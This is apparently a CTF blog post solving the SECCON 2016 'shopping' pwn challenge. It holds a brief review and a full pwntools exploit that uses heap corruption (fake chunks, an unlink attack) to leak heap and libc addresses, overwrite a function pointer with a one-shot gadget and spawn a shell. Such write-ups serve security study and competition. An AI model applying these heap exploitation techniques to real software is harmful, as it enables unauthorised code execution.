cdor1's lab
SECCON 2016 shopping
Review: the challenge itself was not that hard, but analyzing it was really painful.
There are a huge number of structs and a lot of menus, so the exploit gets long as well; in many ways it was a mental-toughness training problem.
If you want to stay focused for a long time, I recommend this challenge.
```python
from pwn import *

s = remote('localhost', 4000)


# Menu wrappers: each waits for the binary's prompt and sends the matching choice.

def overwrite(payload, yorn):
    # Select index -1 at the prompt, answer 'y', send the payload,
    # then answer the final yes/no prompt with yorn
    print s.recvuntil(': ')
    s.sendline('-1')
    print s.recvuntil('>>')
    s.sendline('y')
    print s.recvuntil(':')
    s.sendline(payload)
    print s.recvuntil('>>')
    s.sendline(yorn)


def overwrite2(payload):
    # Same index -1 path, but answer 'n' then 'y' before sending the payload
    print s.recvuntil(': ')
    s.sendline('-1')
    print s.recvuntil('>>')
    s.sendline('n')
    print s.recvuntil('>>')
    s.sendline('y')
    print s.recvuntil(':')
    s.sendline(payload)


def shopmode():
    print s.recvuntil(':')
    s.sendline('1')


def customermode():
    print s.recvuntil(':')
    s.sendline('2')


def re():
    # Drain pending output and return to the top-level menu
    print s.recv(4096)
    s.sendline('0')


def shop_add(name, price, stock):
    print s.recvuntil(':')
    s.sendline('1')
    print s.recvuntil('Name >> ')
    s.sendline(name)
    print s.recvuntil('Price >> ')
    s.sendline(str(price))   # str() so integer arguments work as well
    print s.recvuntil('Stock >> ')
    s.sendline(str(stock))


def shop_list():
    print s.recvuntil(':')
    s.sendline('2')


def shop_reset():
    print s.recvuntil(': ')
    s.sendline('3')


def customer_add(name, num):
    print s.recvuntil(': ')
    s.sendline('1')
    print s.recvuntil('Product name >> ')
    s.sendline(name)
    print s.recvuntil('Amount >> ')
    s.sendline(str(num))


def customer_list():
    print s.recvuntil(': ')
    s.sendline('2')


def customer_buy():
    print s.recvuntil(': ')
    s.sendline('3')


def customer_reset():
    print s.recvuntil(': ')
    s.sendline('4')


# Stage 1: register a product with INT_MAX price and stock, then buy one of it
shopmode()
shop_add('dor1', '2147483647', '2147483647')
re()
customermode()
customer_add('dor1', 1)
customer_buy()
re()

# Stage 2: back in shop mode, answer 'y' and send two inputs; the second one
# is 0x29 bytes of filler followed by the value 0xa0
shopmode()
print s.recvuntil('>>')
s.sendline('y')
print s.recvuntil(':')
s.sendline('a' * 64)
print s.recvuntil(':')
pay = 'b' * 0x29 + p64(0xa0)
s.sendline(pay)
shop_add('dor2', 1, 1)
shop_add('dor3', 1, 1)
re()

# Stage 3: heap leak. pay2 lays down a fake chunk header (0 / 0x31) followed
# by the address 0x603118; shop_list then prints what that pointer refers to
pay2 = 'a' * 0x60
pay2 += p64(0)
pay2 += p64(0x31)
pay2 += p64(0x603118)
overwrite(pay2, 'n')
shopmode()
shop_list()
print s.recvuntil(')')
heap = u64(s.recv(6).ljust(8, '\x00'))
log.info('heap : ' + hex(heap))
re()

# Stage 4: same trick with 0x603018 to leak a libc pointer (called free here),
# then derive the libc base and the one-shot gadget from the hard-coded offsets
pay3 = 'a' * 0x60
pay3 += p64(0x0)
pay3 += p64(0x31)
pay3 += p64(0x603018)
overwrite(pay3, 'n')
shopmode()
shop_list()
print s.recvuntil(')')
free = u64(s.recv(6).ljust(8, '\x00'))
base = free - 0x1F470
one_shot = base + 0x464D8
log.info('free : ' + hex(free))
log.info('base : ' + hex(base))
log.info('one_shot : ' + hex(one_shot))

# Stage 5: pay4 places fd/bk pointers just before 0x603118 (unlink-style),
# then a prev_size of 0xb0 and size 0x30 for the next chunk, and a heap pointer
pay4 = 'a' * 16
pay4 += p64(0x603118 - 0x18)
pay4 += p64(0x603118 - 0x10)
pay4 += 'a' * (0x60 - 32)
pay4 += p64(0xb0)
pay4 += p64(0x30)
pay4 += p64(heap + 0x50)
overwrite(pay4, 'y')
print s.recvuntil(':')

# Stage 6: pay5 repeats the fd/bk pair; shop_reset frees the chunks and the
# resulting unlink leaves 0x603118 pointing back into the pointer table
pay5 = 'b' * 8
pay5 += p64(0x603118 - 0x18)
pay5 += p64(0x603118 - 0x10)
pay5 += '\x00' * 24
overwrite2(pay5)
shopmode()
shop_reset()
re()

# Stage 7: point the now-controlled pointer at 0x6030c0 and write one_shot there
pay6 = 'a' * 0x10
pay6 += p64(0x6030c0)
overwrite2(pay6)
overwrite2(p64(one_shot))

# Stage 8: adding a product calls through the overwritten entry
shopmode()
print s.recvuntil(':')
s.sendline('1')
print s.recvuntil('>>')
s.sendline('aaaa')
s.interactive()
```